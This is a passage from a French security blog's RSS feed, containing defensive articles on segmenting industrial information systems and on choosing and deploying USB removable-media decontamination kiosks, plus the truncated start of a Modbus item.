<li data-leveltext="" data-font="Symbol" data-listid="33" aria-setsize="-1" data-aria-posinset="2" data-aria-level="2"><span data-contrast="none">Sécuriser l’administration du SI en mettant en place une architecture d’administration dédiée ;</span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="33" aria-setsize="-1" data-aria-posinset="3" data-aria-level="2"><span data-contrast="none">Equiper les administrateurs avec les </span><b><span data-contrast="none">outils adéquats</span></b><span data-contrast="none"> pour intervenir sur l’ensemble du parc </span><span data-contrast="none">Industriel</span><span data-contrast="none"> ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="33" aria-setsize="-1" data-aria-posinset="4" data-aria-level="2"><span data-contrast="none">Intégrer dès le départ, lorsque cela est possible, l’</span><b><span data-contrast="none">intervention des mainteneurs externes</span></b><span data-contrast="none">.</span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<p><span data-contrast="none">Ces </span><b><span data-contrast="none">quatre principes sont les pierres angulaires de la sécurisation de l’architecture d’un SI Industriel</span></b><span data-contrast="none">.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<h3><span data-contrast="none">Le cloisonnement, le début de la réduction de l’exposition </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></h3>
<p><span data-contrast="none">Les SI de Gestion et Industriels n’ont, par essence, pas les mêmes buts : l’un sert à faire fonctionner une entreprise (messagerie, gestion, outils collaboratifs…) tandis que l’autre sert à opérer des procédés physiques. Théoriquement, ils devraient </span><span data-contrast="none">être cloisonnés </span><span data-contrast="none">et seuls certains flux autorisés mais le retour terrain montre que c’est rarement le cas.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Comme dans toute démarche de sécurisation d’un SI, il convient d’</span><b><span data-contrast="none">adopter le principe de strict nécessaire </span></b><span data-contrast="none">afin de limiter l’exposition aux cybermenaces. Les interconnexions entre la Gestion et l’Industriel ne doivent répondre qu’à des besoins spécifiques comme par exemple :</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="27" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">L’envoi des ordres de productions aux SCADA<a href="#_ftnref1">[1]</a></span><span data-contrast="none"> </span><span data-contrast="none">;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="27" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">Le transfert des fichiers de FAO<a href="#_ftnref2">[2]</a></span><span data-contrast="none"> aux machines à commandes numériques ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="27" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">La remontée des données de productions pour garantir un pilotage des opérations.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<figure id="post-12309 media-12309" class="align-none"></figure>
<figure id="post-12693 media-12693" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12693 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image.png" alt="" width="1012" height="346" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image.png 1012w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-437x149.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-71x24.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-768x263.png 768w" sizes="auto, (max-width: 1012px) 100vw, 1012px" /></figure>
<p><b><span data-contrast="none">Le SI Industriel se doit également d’être cloisonné en son sein</span></b><span data-contrast="none"> afin de réduire le risque de propagation. Pour ce faire, nous pouvons suivre le principe de zones et conduits tel que décrit dans la norme IEC 62443. </span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">En pratique, nous pouvons </span><b><span data-contrast="none">effectuer ce cloisonnement en plusieurs étapes</span></b><span data-contrast="none"> :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="25" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">Lister les fonctions Métier avec différents niveaux de sûreté ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="25" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">Rassembler les fonctions de même niveau de forme de zones (avec potentiellement une zone « </span><span data-contrast="none">legacy</span><span data-contrast="none"> » et ses sous-zones) ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="25" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span data-contrast="none">Mettre en place les règles de sécurité par zone en fonction de leurs besoins tels que décrits dans la norme IEC 62443 ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="25" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><span data-contrast="none">Vérifier que les interconnexions (conduits) entres les différentes zones respectent les règles de sécurité ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="25" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">Migrer les applications – la mise en conformité des applications peut </span><span data-contrast="none">être longue et difficile</span><span data-contrast="none"> et il peut ici </span><span data-contrast="none">être </span><span data-contrast="none">opportun de procéder par analyse de risques pour prioriser et piloter, et de lister les non-conformités et les plans de remédiations associés. De même la migration elle-même peut être complexe pour s’assurer de ne pas impacter les opérations. </span><span data-contrast="auto"> </span></li>
</ul>
<figure id="post-12311 media-12311" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12311 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-4.png" alt="" width="1356" height="555" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-4.png 1356w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-4-437x179.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-4-768x314.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-4-71x29.png 71w" sizes="auto, (max-width: 1356px) 100vw, 1356px" /></figure>
<h3></h3>
<h3><span data-contrast="none">La particularité des SI de sureté  </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></h3>
<p><span data-contrast="none">Les SI de sûreté sont les SI </span><span data-contrast="none">Industriel</span><span data-contrast="none">s permettant de mettre en condition de sûreté les systèmes </span><span data-contrast="none">Industriel</span><span data-contrast="none">s de production. Ils ont longtemps été mécaniques, puis pneumatiques,</span><span data-contrast="none"> électriques</span><span data-contrast="none"> avant d’être numérisés.  On comprend donc l’importance d’en assurer spécifiquement l’intégrité. Un dernier chantier de cloisonnement peut donc </span><span data-contrast="none">être envisagé</span><span data-contrast="none"> pour le permettre. Cependant, on se rend bien souvent compte sur le terrain que l’existant peut être un frein et donc rendre ce chantier complexe. </span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Lorsqu’elle est réalisée de manière stricte, la séparation permet de réduire les risques de propagation, d’avoir des niveaux de sécurité distincts entre SI de production et SI de sûreté en fonction de leurs niveaux de risques. Elle a cependant l’inconvénient de nécessiter un système SCADA dédié et est donc coûteuse et non ergonomique pour les opérations. </span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<figure id="post-12313 media-12313" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12313 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-5.png" alt="" width="1371" height="532" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-5.png 1371w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-5-437x170.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-5-768x298.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-5-71x28.png 71w" sizes="auto, (max-width: 1371px) 100vw, 1371px" /></figure>
<p>&nbsp;</p>
<figure id="post-12315 media-12315" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12315 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-6.png" alt="" width="1051" height="827" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-6.png 1051w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-6-243x191.png 243w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-6-768x604.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-6-50x39.png 50w" sizes="auto, (max-width: 1051px) 100vw, 1051px" /></figure>
<p style="text-align: center;"><em>Figure 1 - Schéma de cloisonnement SI Industriel / SI de Sûreté (SIS)  </em></p>
<p><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:555,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Après avoir lancé</span><span data-contrast="none">e</span><span data-contrast="none"> cette démarche d’identification et </span><span data-contrast="none">de cloisonnement des </span><span data-contrast="none">SI Industriel</span><span data-contrast="none">s</span><span data-contrast="none">, il convient de traiter de leur administration. Comment concilier sécurité, </span><span data-contrast="none">gain opérationnel et disponibilité de l’outil de production ? Nous vous en parlerons très prochainement</span><span data-contrast="none">.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p>&nbsp;</p>
<p><a href="#_ftnref1" name="_ftn1">[1]</a> SCADA i.e. Supervisory Control And Data Acquisition system</p>
<p><a href="#_ftnref2" name="_ftn2">[2]</a> FAO i.e. Fabrication Assistée par Ordinateur</p>
<p><a href="#_ftnref3" name="_ftn3">[3]</a> DMZ i.e. Demilitarized Zone.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-1-3/">Saga (1/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Outils de décontamination de médias amovibles &#8211; Les facteurs de succès pour un gain de sécurité effectif et un déploiement réussi</title>
		<link>https://www.riskinsight-wavestone.com/2019/05/outils-de-decontamination-de-medias-amovibles-les-facteurs-de-succes-pour-un-gain-de-securite-effectif-et-un-deploiement-reussi/</link>
		
		<dc:creator><![CDATA[Loïc Lebain]]></dc:creator>
		<pubDate>Mon, 20 May 2019 19:57:40 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[ICS]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[MCS]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[Supports amovibles]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=11891</guid>

					<description><![CDATA[<p>Du fait de leur accessibilité et leur facilité d’utilisation, les clés et autres périphériques de stockage USB sont répandus et largement utilisés. On désignera dans cet article l’ensemble de ces périphériques sous l’appellation générique « média amovible ». Les réseaux...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/05/outils-de-decontamination-de-medias-amovibles-les-facteurs-de-succes-pour-un-gain-de-securite-effectif-et-un-deploiement-reussi/">Outils de décontamination de médias amovibles &#8211; Les facteurs de succès pour un gain de sécurité effectif et un déploiement réussi</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Du fait de leur accessibilité et leur facilité d’utilisation, les clés et autres périphériques de stockage USB sont répandus et largement utilisés. On désignera dans cet article l’ensemble de ces périphériques sous l’appellation générique « média amovible ».</em></p>
<p><em>Les réseaux industriels aussi appelés « OT » (Operating Technology) ou « Réseaux de production » regroupent ici aussi bien : les réseaux de production dans les usines, les bancs de test, laboratoires de recherche ou bien encore les réseaux embarqués dans des produits technologiques : train, voiture, avion, etc.</em></p>
<p>&nbsp;</p>
<h2>Les clés USB, véritables couteaux Suisses des SI Industriels, se révèlent être de formidables vecteurs de cyberattaques</h2>
<h3>Des réseaux industriels particulièrement vulnérables</h3>
<p>Les systèmes industriels ont des durées de vie importantes pouvant s’élever à plusieurs dizaines d’année. Ces durées bien supérieures à celles communes dans l’IT classique, les confrontent à des problèmes d’obsolescence matérielle ou logicielle. Ces systèmes ne sont alors plus maintenus par leurs fournisseurs qui ne publient plus de mises à jour de sécurité. Le maintien en condition de sécurité est alors complexe voire impossible.</p>
<p>Même lorsque des mises à jour sont publiées leur application pose des problèmes. En effet cela nécessite de disposer d’une fenêtre de maintenance. Celle-ci peut avoir un impact opérationnel. Il faut également dans certains cas requalifier le système ou effectuer des tests techniques et fonctionnels avant de pouvoir redémarrer.</p>
<p>De plus, la standardisation des systèmes est devenue la norme. On trouve couramment des Systèmes d’Exploitation Windows ou Linux similaires au monde IT, les patchs de sécurité en moins. Cette facilité d’utilisation, est aussi exploitée par les virus informatiques.</p>
<p>L’obsolescence des systèmes industriels couplée à une difficulté de les maintenir en condition de sécurité et une standardisation devenue la norme, les rendent de plus en plus vulnérables aux cybermenaces. Encore faut-il accéder au réseau industriel pour exploiter ces vulnérabilités, ceux-ci étant historiquement moins exposés…</p>
<p>&nbsp;</p>
<h3>Ces vulnérabilités sont régulièrement exploitées en utilisant les médias amovibles comme vecteur</h3>
<p>Or, les médias amovibles sont souvent utilisés comme pont entre le réseau bureautique interne ou un réseau externe et le réseau industriel, par exemple :</p>
<ul>
<li>Les périphériques de stockage USB peuvent être utilisés pour déployer des configurations ou des correctifs sur les systèmes déconnectés. Ces fichiers de configuration ou patchs sont issus de postes de travail qui se trouvent sur le réseau d’entreprise et qui disposent d’une connexion internet. Ces postes sont exposés aux menaces cyber, en conséquence les médias amovibles le sont aussi et à travers eux les systèmes déconnectés.</li>
<li>De nombreux prestataires interviennent sur le réseau industriel pour acheminer des fichiers de configuration, outils de débogage et autres logiciels. Ils utilisent pour ce faire des clés USB. La multiplicité des sous-traitants implique un grand nombre d’échanges depuis des réseaux non maitrisés vers les réseaux industriels, chacun potentiellement vecteur de menace.</li>
</ul>
<p>Ces échanges exposent le réseau industriel à plusieurs types de menaces :</p>
<ul>
<li>Il existe de nombreux virus exploitant des vulnérabilités Windows se propageant grâce aux médias amovibles. Un des plus connus reste le virus Conficker qui exploite le mécanisme de lancement automatique de tâche des médias amovibles et parvient ainsi à lancer automatiquement une charge virale au branchement du média. Une fois un ordinateur infecté, il a la capacité de se propager à d’autres hôtes en passant par un réseau informatique.</li>
<li>Les périphériques de stockage peuvent également être détournés de leurs utilisations, ce type d’attaque est appelé « <a href="https://srlabs.de/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf">Bad USB</a> ». Rubber Ducky en est un exemple, il fait passer une clé USB pour un périphérique d’entrée comme un clavier, pour lancer des commandes au branchement du périphérique avec un ordinateur.</li>
<li>Au branchement avec un ordinateur, les USB killers qui se présentent comme des clés USB ordinaires, accumulent de l&rsquo;énergie jusqu&rsquo;à être sous haute-tension, puis rejettent cette énergie dans l&rsquo;ordinateur hôte pour en détruire les composants physiques.</li>
</ul>
<p>&nbsp;</p>
<h3>Or, l’utilisation de ces médias amovibles est difficilement contournable</h3>
<p>Or, les médias amovibles peuvent être utilisés dans plusieurs cas comme par exemple le stockage de données, la sauvegarde, le transfert ou le partage d’information.</p>
<p>Ces différents cas d’usage sont apparus progressivement, souvent à l’initiative des utilisateurs sans réel encadrement de la DSI ou d’une direction métier. Lorsqu’on étudie ces différentes situations on peut les classer en deux catégories :</p>
<ul>
<li>Ceux qui sont facilement supprimables en proposant soit une alternative plus sécurisée soit une méthode de travail adaptée. Par exemple dans le cas de deux réseaux industriels connectés entre eux, la mise en place d’un espace de partage de fichiers sur le réseau peut remplacer un échange direct par média amovible.</li>
<li>Ceux qui pourraient être supprimés au prix d’investissements importants ou très difficilement supprimables immédiatement. La situation typique est le cas d’un réseau isolé pour installer un nouvel ordinateur, le recours à un master par disque dur USB peut être difficile à remplacer.</li>
</ul>
<p>Il est difficile de se passer totalement de l&rsquo;utilisation des médias amovibles cependant leur utilisation reste problématique. Face à cette source de menace des solutions commencent à émerger.</p>
<p>&nbsp;</p>
<h2>De multiples solutions techniques qui émergent mais qui apportent une solution partielle</h2>
<h3>Une myriade de solutions techniques de plus en plus disponibles</h3>
<p>Il existe différentes solutions techniques permettant de contrôler à différents niveaux le contenu ou l’utilisation d’un média amovible. On peut les catégoriser en plusieurs familles de solutions :</p>
<ul>
<li>Les bornes ou boitiers de décontamination seuls permettent, grâce à une ou plusieurs bases antivirales disponibles depuis l’équipement, d’analyser le contenu de la clé et si nécessaire de la formater ou de mettre en quarantaine les fichiers considérés comme malveillants. Plusieurs constructeurs proposent ce type de solutions, notamment : KUB, HOGO, Orange et SOTERIA.</li>
<li>Celles plus complexes qui peuvent délivrer un certificat à la clé pour faire suite à son passage par la borne de décontamination. Ce certificat atteste à l’hôte que la clé a bien été analysée. Cela nécessite qu’un agent soit déployé sur tous les postes de travail pour permettre l’authentification par certificat. OPSWAT et FACTORY Systems comptent parmi les constructeurs. KUB, précédemment cité, propose cette option plus complexe sur ces boitiers.</li>
<li>La dernière regroupe les périphériques utilisés comme filtres jouant le rôle de sas de sécurité s’interposant entre l’hôte et le média amovible. Il s’agit d’un matériel de petite taille, branché directement sur le port USB de l’hôte d’un côté, et sur la clé USB de l’autre côté. Son fonctionnement est basé sur du filtrage par listes blanches et/ou bloque l’écriture depuis le poste de travail vers le média amovible. SECLAB est un exemple de constructeur pour cette solution.</li>
</ul>
<p>Les offres de solutions ayant toutes des caractéristiques différentes, il convient d’identifier parmi elles celle qui répond le mieux aux exigences de sécurité et aux contraintes des utilisateurs.</p>
<p>&nbsp;</p>
<h3>Ces solutions techniques créent des étapes supplémentaires et nécessitent du temps, ce qui peut freiner leur adoption</h3>
<p>En fonction de la solution technique, la décontamination d’un média amovible constitue une étape qui peut être chronophage. En effet si la clé contient un grand nombre de petits fichiers devant tous être contrôlés, le délai de traitement de la tâche sera rallongé. Ce délai est également fortement dépendant de la performance du média testé.</p>
<p>Aussi, un problème de dimensionnement de la borne se pose si le média amovible est utilisé pour pousser de nombreuses mises à jour volumineuses (Microsoft par exemple) voire une base de données WSUS (Windows Server Update Services) complète entre 2 réseaux, celles-ci pouvant atteindre une centaine de Giga-octets de données. Si ce temps n’est pas maitrisé et limité au maximum, les utilisateurs de médias amovibles n’utiliseront pas la technologie choisie.</p>
<p>Un accès difficile découragerait les utilisateurs. En particulier, dans le secteur industriel, il existe de nombreuses contraintes en fonction des zones où les utilisateurs se trouvent. Un changement de zone peut nécessiter de changer d’équipement de protection, de tenue ou passer des contrôles particuliers. Un nombre insuffisant d’équipements conduirait au même problème d’accessibilité.</p>
<p>Il est nécessaire de placer les équipements là où la décontamination est encouragée ou incontournable (accueil, bureau de sûreté), et de trouver le bon compromis entre les différentes implémentations de solutions : solution appliquée centralement (borne) ou distribuée (boitier ou filtre).</p>
<p>&nbsp;</p>
<h3>Ces solutions techniques nécessitent souvent un Maintien en Condition Opérationnelle (MCO) et un Maintien en Condition de Sécurité (MCS) qui ne doivent pas être négligés</h3>
<p>Le bon fonctionnement des solutions techniques identifiées implique de les mettre à jour, mettre à jour leurs bases virales dans le cas où la solution intègre un anti-virus, mettre à jour les règles de filtrage ainsi que pour les systèmes plus complexes la base de certificats. Il est également utile d’être en mesure d’émettre des rapports et des alertes quand l’outil le permet.</p>
<p>Pour cela les bornes de décontamination nécessitent plusieurs types d’accès :</p>
<ul>
<li>Aux serveurs de mises à jour antivirales ;</li>
<li>Aux serveurs de mises à jour de leur système d’exploitation interne ;</li>
<li>Au réseau de supervision pour l’émission des rapports et des alertes ;</li>
<li>Parfois à un serveur dédié qui va gérer la base de certificats et la centralisation de l’administration.</li>
</ul>
<p>Ces bornes s’intègrent ainsi dans une architecture plus ou moins complexe.</p>
<p>Les bornes de décontamination sont dotées d’un système d’exploitation et d’applications souvent standards, d’où l’importance de durcir leurs configurations afin qu’elles ne fassent pas elles-mêmes l’objet d’une attaque.</p>
<p>Il est nécessaire de mener une étude sur les solutions techniques envisageables en mettant en perspective la fiabilité, l’utilité, l’efficacité et le coût de chaque option. De même, il est indispensable de mener une réflexion sur la gouvernance de ces équipements qui se situent au carrefour entre le SI de gestion et le SI industriel. Cela doit permettre d’éviter les problèmes de sous-dimensionnement d’un projet d’implémentation de ces solutions qui conduirait les utilisateurs à se détourner de la solution choisie.</p>
<p><em>La protection des systèmes industriels contre les menaces issues de l’utilisation des clés USB passe par un choix réfléchi de la solution technique et de sa mise à disposition des utilisateurs. Sans cela et sans une sensibilisation aux enjeux de cybersécurité, les systèmes sont exposés et les impacts d’une attaque sont non-négligeables.</em></p>
<p>&nbsp;</p>
<h2>Ces outils doivent faire l&rsquo;objet d&rsquo;un projet complet : de la prise en compte des cas d&rsquo;usage et la conduite du changement</h2>
<h3>Les cas d’utilisation doivent être connus pour arbitrer entre les différentes solutions voire supprimer l’utilisation du média amovible</h3>
<p>Avant de proposer une solution technique, la 1<sup>ère</sup> question à se poser porte sur la nécessité d’utiliser un média amovible. Pour y répondre, il faut lister avec les utilisateurs les différents cas d’usage existant.</p>
<p>Pour chaque cas, il faut déterminer si leur utilisation est bien appropriée et s’il n’existe pas de solution alternative plus efficace et plus sûre. Voici quelques exemples de situations couramment rencontrées pour lesquelles des solutions alternatives existent :</p>
<ul>
<li>Si une clé USB est utilisée comme lieu de stockage de fichiers de configuration alors une solution centralisée ou à minima le stockage sur un équipement adapté peuvent être proposés.</li>
<li>Dans le cas d’un média utilisé entre deux équipements eux même connectés à un réseau, la mise en place d’un serveur d’échange, par exemple utilisant un protocole sécurisé comme SFTP sera envisagé.</li>
<li>Pour les mainteneurs intervenant sur des systèmes connectés utilisant des médias amovibles pour mettre à jour des fichiers de configuration, une passerelle d’échange type MFT (Managed File Transfer) avec contrôle antivirale pourra être proposée. Cette application s’assure de l’innocuité d’un fichier en provenance d’une source externe avant de le mettre à disposition en interne. Une solution tierce consisterait à mettre des médias amovibles sécurisés à la disposition du personnel ou du mainteneur, en autorisant uniquement depuis des postes sas l&rsquo;écriture sur ces médias.</li>
</ul>
<p>Dans les cas restants, une solution adaptée est à envisager. La solution devra être présentée aux utilisateurs et son intérêt expliqué. Pour une meilleure adoption elle devra influer le moins possible sur le processus métier préexistant, à minima ne pas représenter une surcharge de travail ou de temps trop importante.</p>
<p>&nbsp;</p>
<h3>En plus de s’intégrer au cas d’usage métier, la solution technique doit répondre aux objectifs de sécurité visés</h3>
<p>2 critères de choix sont à prendre en compte dans le cadre d’un projet de déploiement d’une solution de sécurisation des médias amovibles : le cas d’usage métier et les objectifs de sécurité visés.</p>
<p>Les objectifs de sécurité recherchés sont souvent les 2 mêmes : vérifier qu’un périphérique de stockage en est bien un (et pas une « Bad USB ») et vérifier que celle-ci ne comporte pas de charge virale. Ces 2 objectifs sont couverts par la majorité des solutions du marché.</p>
<p>C’est donc le cas d’usage métier qui va influer sur l’ergonomie de la solution retenue :</p>
<ul>
<li>Une borne fixe monobloc s’intègre bien à l’entrée d’une zone réservé à des opérateurs comme un laboratoire ou un atelier. A l’inverse une tablette permettra d’être plus mobile et de pouvoir être utilisée dans plusieurs cas d’usage.</li>
<li>Une solution par certificat nécessitant un agent sur l’équipement ne posera pas de difficulté sur des postes standards sans qualification particulière mais peut être problématique dans des environnements qualifiés ou déjà obsolètes.</li>
<li>Dans le cas d’une population mobile et devant toujours disposer d’un moyen de contrôler un média amovible, une solution par filtre peut être envisagée.</li>
</ul>
<p>Une fois le type de solution choisie, les possibilités d’intégration de la solution à l’écosystème existant et les options de sécurité proposées permettront de sélectionner celle la plus adaptée.</p>
<p>&nbsp;</p>
<h3>La solution retenue doit intégrer des fonctions d’administration et de remontée d’incidents tout en garantissant un niveau de sécurité adapté</h3>
<p>L’outil choisi doit être facilement administrable et notamment doté d’une administration centralisée si un nombre conséquent d’équipements est envisagé. Il est également nécessaire que la solution puisse être mise jour, aussi bien : le système d’exploitation de la solution, les applications embarquées et notamment antivirales ainsi que les bases de signatures.</p>
<p>Ces fonctionnalités sous-entendent que la solution aura besoin d’une connexion sur le réseau d’administration et d’une connexion à l’extérieur pour récupérer ces mises à jour. Ces connexions doivent être sécurisées et le serveur de mise à jour systématiquement identifié.</p>
<p>En outre, il est nécessaire de prendre des précautions en vérifiant que la solution a été durcie et que seules les fonctions utiles sont disponibles, notamment au niveau du système d’exploitation. Cela serait un comble que l’outil de décontamination des clés soit lui-même le vecteur de contaminations de celles-ci !</p>
<p>Enfin, il est préférable que les rapports et journaux d’évènement générés puisse être envoyé dans un format standard type Syslog, centralisés et analysés par un SIEM déjà en place afin de détecter et de tracer toutes activités suspectes.</p>
<p>&nbsp;</p>
<h3>En conclusion, l&rsquo;implémentation doit faire l&rsquo;objet d&rsquo;une conduite du changement auprès des personnes qui utiliseront réellement la borne tous les jours</h3>
<p>Il existe bien des solutions techniques qui, en analysant et décontaminant ces périphériques, permettent de réduire l’exposition par les médias amovibles des réseaux industriels. Il y a 2 facteurs de succès visibles à 1<sup>ère</sup> vue pour une bonne implémentation :</p>
<ul>
<li>Une solution pensée aux cas d’usage métier avec les utilisateurs finaux ;</li>
<li>Une solution où les aspects d’administration, de mise à jour et de sécurité ont été étudiés en amont.</li>
</ul>
<p>A ceux-ci s’ajoute un 3<sup>ème</sup> facteur de succès : l’accompagnement au changement qui doit s’assurer de la bonne intégration du nouvel outil aux processus existants et un dialogue avec les utilisateurs finaux.</p>
<p>Pour compléter ce dispositif, il est nécessaire de formaliser une procédure en cas de découverte d’un virus ou toute situation anormale. Détecter n’est finalement que le 1<sup>er</sup> pas vers une réaction adaptée.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/05/outils-de-decontamination-de-medias-amovibles-les-facteurs-de-succes-pour-un-gain-de-securite-effectif-et-un-deploiement-reussi/">Outils de décontamination de médias amovibles &#8211; Les facteurs de succès pour un gain de sécurité effectif et un déploiement réussi</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fun with Modbus 0x5A</title>
		<link>https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/</link>
		
